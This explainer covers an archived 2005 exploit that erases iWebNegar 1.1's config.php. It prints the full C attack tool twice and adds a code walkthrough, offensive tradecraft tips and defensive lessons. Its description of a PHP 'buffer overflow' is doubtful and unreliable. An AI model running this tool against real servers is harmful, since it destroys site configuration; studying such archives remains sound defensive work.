iWebNegar 1.1 Configuration Nullification DoS Explained

What this paper is

This paper details a Denial of Service (DoS) vulnerability in iWebNegar version 1.1, a PHP-based web application. The exploit, written in C, targets a buffer overflow in the conf_edit.php script. When triggered, this overflow causes the application to delete its config.php file, effectively disabling its configuration and rendering it unusable.

Simple technical breakdown

The core of the vulnerability lies in how iWebNegar handles user input for configuration editing. Specifically, the conf_edit.php script has a weakness where it doesn't properly check the size of data it receives. The exploit sends an overly long string to this script. This long string overwrites a buffer in memory, and when the script tries to process it, it leads to a crash or an unintended execution path. In this case, the unintended path calls a Die() function which is designed to erase the config.php file.

Complete code and payload walkthrough

The provided C code is a Windows executable designed to exploit the iWebNegar vulnerability.

/*
    iwebnegar 1.1 remote exploit
    c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
        bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
        compile with Ms visual C++ (the php version written by the bug finder but still priv8)
        greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
        Jamie & Ben from exploitdev .
        Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
  */
  /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
      go to Die() functions which cause the erase of config.php
  */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

 

int main (int argc, char *argv[]){



 char req[] =
          "GET /admin/conf_edit.php?";
  unsigned int rc,addr,sock ;
  struct sockaddr_in tcp;
  struct hostent * hp;
  WSADATA wsaData;
char buffer[size];

   memset(buffer,'A',300);
   memcpy(buffer,req,25);

                if(argc < 2) {
                printf("\nusage : iwebnegar host\n");
                printf("example : iwebnegar.exe 127.0.0.1\n");
                exit(-1) ;
        }
  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("WSAStartup failed !\n");
   exit(-1);
  }
        hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("Unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("socket() error...\n");
   exit(-1);
  }
          if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
   tcp.sin_family = AF_INET;

  tcp.sin_port=htons(80);
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;
  printf("[+] Building overflow string\n");
  Sleep(1000);
  printf("[+] packet size = %d byte\n" , sizeof(buffer));
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
        Sleep(1000) ;
         printf("[+] connected\n") ;
         
         send(sock , buffer , sizeof(buffer) , 0);
        
         printf("[+] see if the config.php erased ! \n\n") ;
             
        }
  else {
  printf("the 80 port is not open try another webserver port\n");
 

  }
}

// milw0rm.com [2005-01-04]

Code Fragment/Block -> Practical Purpose

• /* ... */ (Comment blocks): These are informational comments from the author, providing context about the exploit's origin, authors, and the vulnerability. They don't affect the code's execution.
• #include <stdio.h>, #include <stdlib.h>, #include <string.h>, #include <winsock2.h>: These lines include standard C libraries and the Windows Sockets API library. They provide functions for input/output, memory allocation, string manipulation, and network communication, respectively.
• #pragma comment(lib, "ws2_32.lib"): This directive tells the Microsoft Visual C++ compiler to link against the ws2_32.lib library, which is essential for using the Windows Sockets API.
• #define size 300: Defines a constant size with a value of 300. This is used for the size of the buffer array.
• int main (int argc, char *argv[]): The main function where program execution begins. argc is the argument count, and argv is an array of strings representing the command-line arguments.
• char req[] = "GET /admin/conf_edit.php?";: Declares a character array req and initializes it with the beginning of an HTTP GET request. This is the target path for the exploit.
• unsigned int rc,addr,sock;: Declares unsigned integer variables for return codes (rc), IP addresses (addr), and socket descriptors (sock).
• struct sockaddr_in tcp;: Declares a structure tcp of type sockaddr_in, which holds internet address information (family, port, IP address).
• struct hostent * hp;: Declares a pointer hp to a hostent structure, which will store information about a host resolved by its name.
• WSADATA wsaData;: Declares a WSADATA structure, which is used by WSAStartup to store Windows Sockets initialization information.
• char buffer[size];: Declares a character array buffer of size 300. This buffer will hold the crafted HTTP request.
• memset(buffer,'A',300);: Fills the entire buffer with the character 'A'. This initializes the buffer with a known pattern, useful for debugging and for creating the overflow.
• memcpy(buffer,req,25);: Copies the content of req (the "GET /admin/conf_edit.php?") into the beginning of the buffer. The length 25 is the size of req.
• if(argc < 2) { ... }: Checks if the program was run with at least one command-line argument (the target host). If not, it prints usage instructions and exits.
• if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0) { ... }: Initializes the Windows Sockets DLL. If it fails, it prints an error and exits. MAKEWORD(2,1) specifies the requested version of the Winsock API.
• hp = gethostbyname(argv[1]);: Attempts to resolve the hostname provided as the first command-line argument (argv[1]) into an IP address.
• if (!hp) { addr = inet_addr(argv[1]); }: If gethostbyname fails (meaning argv[1] is not a resolvable hostname), it attempts to interpret argv[1] directly as an IP address using inet_addr.
• if ((!hp) && (addr == INADDR_NONE)) { ... }: Checks if both hostname resolution and IP address parsing failed. If so, it prints an error and exits. INADDR_NONE is a special value indicating an invalid IP address.
• sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);: Creates a TCP socket. AF_INET specifies the IPv4 address family, SOCK_STREAM indicates a stream socket (TCP), and IPPROTO_TCP specifies the TCP protocol.
• if (!sock) { ... }: Checks if socket creation failed. If so, it prints an error and exits.
• if (hp != NULL) memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); else tcp.sin_addr.s_addr = addr;: Populates the tcp.sin_addr field with the IP address. If hp is valid (hostname resolved), it uses the address from hp. Otherwise, it uses the address parsed by inet_addr.
• if (hp) tcp.sin_family = hp->h_addrtype; else tcp.sin_family = AF_INET;: Sets the address family for the sockaddr_in structure. It uses the family from hp if available, otherwise defaults to AF_INET (IPv4).
• tcp.sin_port=htons(80);: Sets the destination port to 80 (HTTP) in network byte order using htons.
• printf("\n[+] attacking host %s\n" , argv[1]) ;: Informs the user which host is being targeted.
• printf("[+] Building overflow string\n");: Indicates that the exploit payload is being prepared.
• Sleep(1000);: Pauses execution for 1000 milliseconds (1 second). This is likely for visual effect or to allow network services to be ready.
• printf("[+] packet size = %d byte\n" , sizeof(buffer));: Displays the size of the crafted packet.
• rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));: Attempts to establish a TCP connection to the target host and port.
• if(rc==0) { ... }: If the connection is successful (rc is 0):
  • Sleep(1000);: Another pause.
  • printf("[+] connected\n") ;: Confirms the connection.
  • send(sock , buffer , sizeof(buffer) , 0);: Sends the crafted buffer (the oversized HTTP request) over the established socket. This is the point where the overflow occurs on the server.
  • printf("[+] see if the config.php erased ! \n\n") ;: Prompts the user to check if the config.php file has been deleted.
• else { ... }: If the connection fails:
  • printf("the 80 port is not open try another webserver port\n");: Informs the user that port 80 might be closed and suggests trying a different port.

Shellcode/Payload Explanation:

This exploit does not contain traditional shellcode in the sense of executable machine code. The "payload" is the crafted HTTP request itself. The buffer array, after being filled with 'A's and having the req string copied into it, becomes the payload. The key part is that the buffer is filled with 300 'A' characters, and the initial part is GET /admin/conf_edit.php?. The vulnerability is in the PHP script on the server, which receives this long string and, due to insufficient bounds checking, overwrites memory. This memory corruption triggers the Die() function within the PHP script, leading to the deletion of config.php.

Practical details for offensive operations teams

• Required Access Level: Network access to the target web server is required. No prior authentication or user privileges on the iWebNegar application are needed, as this is a remote exploit targeting the web server's handling of requests.
• Lab Preconditions:
  • A vulnerable iWebNegar 1.1 installation accessible via HTTP (port 80 by default).
  • A Windows machine with a C compiler (like Microsoft Visual C++) to compile the exploit.
  • The winsock2.lib library must be available for compilation.
• Tooling Assumptions:
  • The exploit is a standalone C executable compiled for Windows.
  • Standard network utilities are assumed for verification (e.g., ping, telnet to check port status, or a web browser to check the application's state after the attack).
• Execution Pitfalls:
  • Port 80 Closed: The exploit explicitly checks for port 80. If the web server uses a different port, the exploit will fail unless modified.
  • Network Connectivity: Standard network issues (firewalls, routing problems) can prevent the exploit from reaching the target.
  • iWebNegar Version: This exploit is specific to iWebNegar version 1.1. Newer versions or different applications will not be affected.
  • Server-Side Patches: If the server-side PHP script has been patched to correctly handle input lengths, the overflow will not occur.
  • Buffer Size Mismatch: The size of 300 is an assumption. If the actual vulnerable buffer in the PHP script is smaller or larger, the exploit might not work as intended. The 'A' characters are used to fill the buffer and potentially overwrite other critical data, but the primary goal is to trigger the Die() function.
  • PHP Error Handling: The exact behavior upon overflow can depend on the PHP interpreter's configuration and error handling. While the paper states it leads to Die(), other outcomes are possible if the overflow doesn't precisely hit the intended execution path.
• Tradecraft Considerations:
  • Reconnaissance: Confirm the target is running iWebNegar and identify its version. Check if port 80 is open.
  • Payload Delivery: The exploit is a standalone executable. It would be delivered to the operator's machine and executed locally, targeting the remote server.
  • Stealth: This is a DoS attack. It's noisy and will likely be detected by Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS) monitoring HTTP traffic for malformed requests or unusual patterns. The connect() and send() calls are standard network operations.
  • Post-Exploitation: The "post-exploitation" is simply verifying that config.php has been deleted. This would typically be done by trying to access the iWebNegar admin interface or by checking the server's file system (if authorized access is available).

Where this was used and when

• Context: This exploit targets a specific web application (iWebNegar 1.1). Its usage would be limited to environments where this vulnerable version was deployed.
• Timeframe: The exploit was published on January 4, 2005. Therefore, its relevant timeframe for active exploitation would be around 2005 and shortly thereafter, before iWebNegar was updated or replaced. It's unlikely to be effective against modern, patched systems.

Defensive lessons for modern teams

• Input Validation is Crucial: Always validate the size and format of all user-supplied input, especially when it's used in file operations or memory manipulation. This is the fundamental lesson from this exploit.
• Secure Coding Practices: Developers must be trained in secure coding practices to avoid common vulnerabilities like buffer overflows.
• Regular Patching and Updates: Keep all web applications and their underlying frameworks (like PHP) updated to the latest secure versions.
• Web Application Firewalls (WAFs): Deploy WAFs that can detect and block malformed HTTP requests, including those attempting buffer overflows or targeting known vulnerable paths.
• File Integrity Monitoring: Implement file integrity monitoring for critical application files (like config.php) to detect unauthorized modifications or deletions.
• Least Privilege: Ensure that the web server process runs with the minimum necessary privileges. If the web server process were compromised, it should not have the ability to delete critical configuration files.
• Error Handling: Implement robust error handling that doesn't reveal sensitive information or lead to unintended actions. The Die() function being directly callable via an overflow is a poor design.

ASCII visual (if applicable)

This exploit is a client-side attack that sends a malformed HTTP request to a vulnerable server-side script.

+-----------------+       +-----------------------+       +-----------------------+
| Attacker's Host | ----> | Network (Internet/LAN)| ----> | Target Web Server     |
| (Windows C App) |       |                       |       | (iWebNegar 1.1)       |
+-----------------+       +-----------------------+       +-----------------------+
      |                                                           |
      | 1. Sends crafted HTTP GET request                         |
      |    (overflowing buffer)                                   |
      |                                                           |
      +----------------------------------------------------------->
                                                                  |
                                                                  | 2. PHP script on server
                                                                  |    receives malformed data.
                                                                  |    Buffer overflow occurs.
                                                                  |
                                                                  | 3. 'Die()' function is
                                                                  |    triggered, erasing
                                                                  |    config.php.
                                                                  |
                                                                  +------------------------>
                                                                        (config.php deleted)

Source references

• Paper ID: 738
• Paper Title: iWebNegar 1.1 - Configuration Nullification Denial of Service
• Author: c0d3r
• Published: 2005-01-04
• Keywords: PHP, dos
• Paper URL: https://www.exploit-db.com/papers/738
• Raw Exploit URL: https://www.exploit-db.com/raw/738

Original Exploit-DB Content (Verbatim)

/*
    iwebnegar 1.1 remote exploit
    c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
        bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
        compile with Ms visual C++ (the php version written by the bug finder but still priv8)
        greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
        Jamie & Ben from exploitdev .
        Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
  */
  /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
      go to Die() functions which cause the erase of config.php
  */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

 

int main (int argc, char *argv[]){



 char req[] =
          "GET /admin/conf_edit.php?";
  unsigned int rc,addr,sock ;
  struct sockaddr_in tcp;
  struct hostent * hp;
  WSADATA wsaData;
char buffer[size];

   memset(buffer,'A',300);
   memcpy(buffer,req,25);

                if(argc < 2) {
                printf("\nusage : iwebnegar host\n");
                printf("example : iwebnegar.exe 127.0.0.1\n");
                exit(-1) ;
        }
  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("WSAStartup failed !\n");
   exit(-1);
  }
        hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("Unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("socket() error...\n");
   exit(-1);
  }
          if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
   tcp.sin_family = AF_INET;

  tcp.sin_port=htons(80);
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;
  printf("[+] Building overflow string\n");
  Sleep(1000);
  printf("[+] packet size = %d byte\n" , sizeof(buffer));
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
        Sleep(1000) ;
         printf("[+] connected\n") ;
         
         send(sock , buffer , sizeof(buffer) , 0);
        
         printf("[+] see if the config.php erased ! \n\n") ;
             
        }
  else {
  printf("the 80 port is not open try another webserver port\n");
 

  }
}

// milw0rm.com [2005-01-04]